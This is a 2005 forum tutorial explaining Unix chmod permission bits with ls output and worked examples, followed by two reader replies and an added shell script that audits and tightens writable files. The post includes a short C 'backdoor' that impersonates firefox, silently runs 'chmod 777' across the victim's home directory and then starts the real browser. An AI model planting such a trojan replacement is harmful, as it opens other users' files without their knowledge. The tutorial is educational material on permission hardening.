Unix File Permissions: Filtering access to specific files.

#1 tecta

Posted 13 March 2005 - 10:39 PM

Unix File Permissions


About

In this article I hope for the reader to understand Unix file permissions. Unix file permissions set boundaries for other users that aren't permitted to read/write/execute that file. By understanding Unix file permissions you put a major stop to attempted access from local users. In this article I will explain the `chmod` command, and how it's organized. Also, I will explain what people can do if a file isn't chmod'd correctly. And I will display some backdoor code users may be able to use from incorrect chmod settings.

------------------------------

Permissions and Such

Now you may be asking "what is chmod?" Well, chmod is basically the Unix command for setting permissions to files. It's as simple as that, and isn't a hard command to follow. Acknowledge the following...

Owner | Group | Everyone Else

^^ This shows how chmod is handled. This may seem confusing at first but with a few examples you will hopefully understand.

Owner - The owner of the file (basically it's in the owner's dir).
Group - If the owner is in a specific group like wheel, he will be able to give permissions to that file differently than his, and others.
Everyone Else - The outside world, or other users not in his group, and of course not him. Everyone else also indicates if the file is presented on the web, then the people `trying` to read/write/exec the file will have its permissions different than the owner for security reasons.

Consider doing the following:

$ ls -l
$ touch example
$ chmod 777 example
$ ls -la

`$` is the shell... ls is just a command to list files, and -l is an argument to show details (hence permission settings). touch just makes the file. chmod just sets the permissions.

-------------------------------------------------
Example:

r = read, w = write, x = execute (exec)

$ root@ANIGMA:~# ls -l
drwxr-xr-x 4 tiffta 1000 1896 2005-03-12 03:21 BitTorrent-3.9.1/
drwx------ 3 root root 136 2005-02-20 19:29 Desktop/
drwxr-xr-x 2 root root 48 2005-03-12 03:20 Incomplete/
drwxrwxrwx 3 root root 1552 2005-03-01 13:55 LimeWire/
drwx------ 7 root root 520 2005-02-20 23:18 Mail/
-rwxr-xr-x 1 root root 11493 2005-03-13 22:46 a.out*
drwxr-xr-x 2 root root 504 2005-02-24 21:07 code/
-rw-r--r-- 1 root root 4194816 2005-03-10 10:18 cr.smc
-rw-r--r-- 1 root root 531 2005-03-10 17:29 data1.cpp
-rw-r--r-- 1 root root 525 2005-03-10 17:28 data1.cpp~

$ chmod 777 data1.cpp

$ ls
drwxr-xr-x 4 tiffta 1000 1896 2005-03-12 03:21 BitTorrent-3.9.1/
drwx------ 3 root root 136 2005-02-20 19:29 Desktop/
drwxr-xr-x 2 root root 48 2005-03-12 03:20 Incomplete/
drwxrwxrwx 3 root root 1552 2005-03-01 13:55 LimeWire/
drwx------ 7 root root 520 2005-02-20 23:18 Mail/
-rwxr-xr-x 1 root root 11493 2005-03-13 22:46 a.out*
drwxr-xr-x 2 root root 504 2005-02-24 21:07 code/
-rw-r--r-- 1 root root 4194816 2005-03-10 10:18 cr.smc
-rwxrwxrwx 1 root root 531 2005-03-10 17:29 data1.cpp*
-rw-r--r-- 1 root root 525 2005-03-10 17:28 data1.cpp~

---------------------------------

Okay, now notice that

Old: -rw-r--r-- 1 root root 531 2005-03-10 17:29 data1.cpp
New: -rwxrwxrwx 1 root root 531 2005-03-10 17:29 data1.cpp*

Notice anything?

7       7       7
^ Owner ^ Group ^ Other

x = 1
w = 2
r = 4

1+2+4 = 7

So, 7 = highest permission.

$ chmod 755 example
By doing this..

Owner = r+w+x (full access)
Group = r+x (Access, but not full. Just reading, and executing)
Other = r+x (ditto)

Understanding your rights

Reading access is just being able to cat, or vi it. You can read the source basically. But you can't execute it. Like you can't do a

$ ./blah

By not providing users with reading options, you protect letters not wanting to be read, or source not wanting to be read.

Execution access is basically being able to `run` something.

$ ./blah

By being able to exec something, you are able to run scripts under someone else's access. So say a user doesn't set an appropriate permission to a file. You can run it under their permissions, which may be higher than yours. Let's say it's root. So it's a good idea to understand what you're doing.

Writing access is basically being able to update something. So say you want to update someone's code. You can backdoor it (which I will show later). By backdooring it, this can cause all kinds of havoc.

Backdooring

Let's say that someone has firefox on their desktop. And it's named `firefox`. So you make a `firefox` in your dir. Maybe the code looks something like this...

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    system("cd;chmod 777 *"); /* Just goes to the user's home dir, and gives full access to all his files. */
    system("/sbin/firefox");
    return 0;
}


Now, this file should be replaced with the other user's file. Every time he runs the script he updates his files with a full access permission. He will also be satisfied since the real path to firefox is executed.

That code is just an example, I don't know the exact path to firefox, and firefox is just an example I used.

-cheers tecta
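
The following audit sketch is an added example, not part of tecta's post: it converts an `ls -l` mode string to octal using the post's r=4, w=2, x=1 values, lists files and directories that group or other can write to (the condition that makes the replacement trick above possible), and removes that write access. The function names and the scratch directory are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): spot and fix loose permissions.

# Turn an `ls -l` mode string such as "-rwxr-xr-x" into octal ("755"),
# using the post's values: r = 4, w = 2, x = 1.
mode_to_octal() {
    perms=${1#?}                      # drop the leading file-type character
    octal=""
    for i in 1 2 3; do                # owner, then group, then other
        rest=${perms#???}             # everything after the first triplet
        triplet=${perms%"$rest"}
        n=0
        case $triplet in r??) n=$((n + 4)) ;; esac
        case $triplet in ?w?) n=$((n + 2)) ;; esac
        case $triplet in ??[xst]) n=$((n + 1)) ;; esac
        octal="$octal$n"
        perms=$rest
    done
    printf '%s\n' "$octal"
}

# List files and directories under $1 that group or other may write to.
# A writable file can be edited in place; a writable directory lets
# someone else replace the files inside it.
find_loose() {
    find "$1" \( -type f -o -type d \) \( -perm -020 -o -perm -002 \) | sort
}

# Remove group/other write from everything find_loose would report.
tighten() {
    find "$1" \( -type f -o -type d \) \( -perm -020 -o -perm -002 \) \
        -exec chmod go-w {} +
}

# Constructed scratch directory reproducing the post's "chmod 777" case.
demo() {
    dir=$(mktemp -d) || return 1
    touch "$dir/data1.cpp" "$dir/notes.txt"
    chmod 777 "$dir/data1.cpp"        # the over-permissive setting
    chmod 644 "$dir/notes.txt"
    echo "before: $(find_loose "$dir")"
    tighten "$dir"
    echo "after:  $(find_loose "$dir")"
    ls -l "$dir"
    rm -rf "$dir"
}
demo
```

Pointing `find_loose` at the directories on your `PATH` shows anything another local user could swap out before you run it.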


Replies To: Unix File Permissions

#2 no2pencil

Posted 15 June 2007 - 08:36 AM

tecta, on 13 Mar, 2005 - 10:39 PM, said:

That code is just an example, I don't know the exact path to firefox, and firefox is just an example I used.

1st: Great tutorial. An oldie but a goodie, the file level permissions.

The thing with the path on firefox installed on a Linux system is this: the binary executable is installed wherever you tell it to. What I've done in the past is put firefox into my downloads directory (/home/no2pencil/downloads/firefox-2.0.whatever) & then create a symbolic link from that executable to /usr/local/bin so it can launch from any directory.

#3 k.sangeeth

Posted 02 August 2007 - 09:55 PM

Good try to help in understanding file permissions in Linux.
Can anyone add more to the concept of sticky keys?
I always get confused on this topic.